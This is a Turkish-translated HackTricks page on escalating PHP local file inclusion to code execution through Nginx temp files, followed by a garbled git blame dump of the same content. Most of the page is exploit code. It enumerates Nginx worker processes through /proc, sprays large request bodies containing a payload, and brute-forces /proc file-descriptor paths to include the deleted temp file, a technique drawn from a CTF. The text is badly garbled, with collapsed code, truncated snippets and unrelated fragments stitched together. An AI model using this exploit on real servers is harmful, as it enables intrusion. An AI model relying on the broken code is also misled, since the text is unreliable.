hacktricks/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md

# LFI2RCE via Nginx temp files

{% hint style="success" %}
AWS Hacking öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks'i Destekleyin</summary>

* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.

</details>
{% endhint %}

### [WhiteIntel](https://whiteintel.io)

<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve bir şirketin veya müşterilerinin **tehdit altına alınıp alınmadığını** kontrol etmek için **ücretsiz** işlevler sunar.

WhiteIntel'in ana hedefi, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.

Web sitelerini kontrol edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:

{% embed url="https://whiteintel.io" %}

***

## Açık yapılandırma

[**https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)

* PHP kodu:

\`\`\`\`h\`

/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (silindi) ... \`\`\` Not: Bu örnekte doğrudan \`/proc/34/fd/15\` dahil edilemez çünkü PHP'nin \`include\` fonksiyonu yolu \`/var/lib/nginx/body/0000001368 (silindi)\` olarak çözecektir ve bu dosya dosya sisteminde mevcut değildir. Bu küçük kısıtlama, şans eseri, bazı dolaylı yollarla aşılabilir: \`/proc/self/fd/34/../../../34/fd/15\` bu da sonunda silinmiş \`/var/lib/nginx/body/0000001368\` dosyasının içeriğini çalıştıracaktır. ## Tam Sömürü \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # nginx'in istemci gövde tamponlama yardımıyla PHP yerel dosya dahil etme (LFI) sömürüsü # ayrıntılar için https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ adresine bakın URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # nginx işçi süreçlerini bul r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx işçi bulundu: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # nginx'in /var/lib/nginx/body/$X oluşturmasını sağlamak için büyük bir istemci gövdesi yükle def uploader(): print('\[+] yükleyici başlatılıyor') while not done: requests.get(URL, data=' //'
```
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
except:
pass
```
```python
def send\_payload\_worker(requests\_session): while True: send\_payload(requests\_session)

def send\_payload\_multiprocess(requests\_session): # Tüm CPU'ları kullanarak Nginx için yükü istek gövdesi olarak gönderin for \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=send\_payload\_worker, args=(requests\_session,)) p.start()

def generate\_random\_path\_prefix(nginx\_pids): # Bu yöntem, rastgele sayıda ProcFS yol bileşeninden bir yol oluşturur. Oluşturulan bir yol şöyle görünecektir: /proc/\<nginx pid 1>/cwd/proc/\<nginx pid 2>/root/proc/\<nginx pid 3>/root path = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path

def read\_file(requests\_session, nginx\_pid, fd, nginx\_pids): nginx\_pid\_list = list(nginx\_pids) while True: path = generate\_random\_path\_prefix(nginx\_pid\_list) path += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={path}").text except: continue # Bayraklar hxp{} olarak formatlanmıştır if "hxp" in d: print("Bayrak bulundu! ") print(d)

def read\_file\_worker(requests\_session, nginx\_pid, nginx\_pids): # Nginx FD'lerini 10 - 45 arasında bir döngüde tarayın. Dosyalar ve soketler kapandığı için - istek gövdesi FD'sinin bu aralıkta açılması çok yaygındır for fd in range(10, 45): thread = threading.Thread(target = read\_file, args = (requests\_session, nginx\_pid, fd, nginx\_pids)) thread.start()

def read\_file\_multiprocess(requests\_session, nginx\_pids): for nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=read\_file\_worker, args=(requests\_session, nginx\_pid, nginx\_pids)) p.start()

if **name** == "**main**": print('\[DEBUG] İstek oturumu oluşturuluyor') requests\_session = create\_requests\_session() print('\[DEBUG] Nginx pid'leri alınıyor') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pid'leri: {nginx\_pids}') print('\[DEBUG] Yük gönderimi başlatılıyor') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] FD okuyucuları başlatılıyor') read\_file\_multiprocess(requests\_session, nginx\_pids)
```
```

## Labs

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)

## References

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)

### [WhiteIntel](https://whiteintel.io)

<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.

Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.

You can check their website and try their engine for **free** at:

<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
```
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								# LFI2RCE via Nginx temp files
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								{% hint style="success" %}
 								AWS Hacking öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCP Hacking öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								<summary>HackTricks'i Destekleyin</summary>
-												a

											
										
										
											2024-02-03 16:02:14 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
 								* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								{% endhint %}
-												a

											
										
										
											2024-02-05 20:00:40 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								### [WhiteIntel](https://whiteintel.io)
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve bir şirketin veya müşterilerinin **tehdit altına alınıp alınmadığını** kontrol etmek için **ücretsiz** işlevler sunar.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								WhiteIntel'in ana hedefi, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								Web sitelerini kontrol edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
 								{% embed url="https://whiteintel.io" %}
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								***
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								## Açık yapılandırma
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								[**https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* PHP kodu:
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
 								\`\`\`\`h\`
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (silindi) ... \`\`\` Not: Bu örnekte doğrudan \`/proc/34/fd/15\` dahil edilemez çünkü PHP'nin \`include\` fonksiyonu yolu \`/var/lib/nginx/body/0000001368 (silindi)\` olarak çözecektir ve bu dosya dosya sisteminde mevcut değildir. Bu küçük kısıtlama, şans eseri, bazı dolaylı yollarla aşılabilir: \`/proc/self/fd/34/../../../34/fd/15\` bu da sonunda silinmiş \`/var/lib/nginx/body/0000001368\` dosyasının içeriğini çalıştıracaktır. ## Tam Sömürü \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # nginx'in istemci gövde tamponlama yardımıyla PHP yerel dosya dahil etme (LFI) sömürüsü # ayrıntılar için https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ adresine bakın URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # nginx işçi süreçlerini bul r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx işçi bulundu: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # nginx'in /var/lib/nginx/body/$X oluşturmasını sağlamak için büyük bir istemci gövdesi yükle def uploader(): print('\[+] yükleyici başlatılıyor') while not done: requests.get(URL, data=' //'
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
+								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
 								except:
 								pass
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
+								```
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								```python
 								def send\_payload\_worker(requests\_session): while True: send\_payload(requests\_session)
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								def send\_payload\_multiprocess(requests\_session): # Tüm CPU'ları kullanarak Nginx için yükü istek gövdesi olarak gönderin for \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=send\_payload\_worker, args=(requests\_session,)) p.start()
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								def generate\_random\_path\_prefix(nginx\_pids): # Bu yöntem, rastgele sayıda ProcFS yol bileşeninden bir yol oluşturur. Oluşturulan bir yol şöyle görünecektir: /proc/\<nginx pid 1>/cwd/proc/\<nginx pid 2>/root/proc/\<nginx pid 3>/root path = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								def read\_file(requests\_session, nginx\_pid, fd, nginx\_pids): nginx\_pid\_list = list(nginx\_pids) while True: path = generate\_random\_path\_prefix(nginx\_pid\_list) path += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={path}").text except: continue # Bayraklar hxp{} olarak formatlanmıştır if "hxp" in d: print("Bayrak bulundu! ") print(d)
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								def read\_file\_worker(requests\_session, nginx\_pid, nginx\_pids): # Nginx FD'lerini 10 - 45 arasında bir döngüde tarayın. Dosyalar ve soketler kapandığı için - istek gövdesi FD'sinin bu aralıkta açılması çok yaygındır for fd in range(10, 45): thread = threading.Thread(target = read\_file, args = (requests\_session, nginx\_pid, fd, nginx\_pids)) thread.start()
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								def read\_file\_multiprocess(requests\_session, nginx\_pids): for nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=read\_file\_worker, args=(requests\_session, nginx\_pid, nginx\_pids)) p.start()
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:12:31 +00:00
+								if **name** == "**main**": print('\[DEBUG] İstek oturumu oluşturuluyor') requests\_session = create\_requests\_session() print('\[DEBUG] Nginx pid'leri alınıyor') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pid'leri: {nginx\_pids}') print('\[DEBUG] Yük gönderimi başlatılıyor') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] FD okuyucuları başlatılıyor') read\_file\_multiprocess(requests\_session, nginx\_pids)
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
+								```
 								```
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								## Labs
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
 								* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
 								* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
 								* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								## References
-												GitBook: [#3113] No subject

											
										
										
											2022-04-20 19:39:32 +00:00
 								* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								### [WhiteIntel](https://whiteintel.io)
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

											
										
										
											2024-04-18 04:08:29 +00:00
+								<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								You can check their website and try their engine for **free** at:
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>
-												Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

											
										
										
											2024-04-18 03:38:35 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								{% hint style="success" %}
 								Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								<summary>Support HackTricks</summary>
-												a

											
										
										
											2024-02-03 16:02:14 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								</details>
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								{% endhint %}
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								```